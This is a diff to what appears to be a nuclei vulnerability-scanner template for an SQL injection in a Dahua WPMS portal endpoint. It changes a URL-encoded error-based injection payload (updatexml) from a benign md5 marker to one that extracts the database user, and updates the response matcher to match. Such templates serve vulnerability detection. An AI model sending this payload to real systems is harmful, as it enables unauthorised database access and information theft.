--- a/domestic/dahua/dahua-WPMS-SQL-pageJson.yaml
+++ b/domestic/dahua/dahua-WPMS-SQL-pageJson.yaml
@@ -18,8 +18,8 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)--%22%7D/extend/%7B%7D"
+      - "{{BaseURL}}/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20user()),0x7e),1)--%22%7D/extend/%7B%7D"
     matchers:
       - type: word
         words:
-          - "1e469dbcb9211897b5f5ebf866c66f3"
+          - "mysql@"
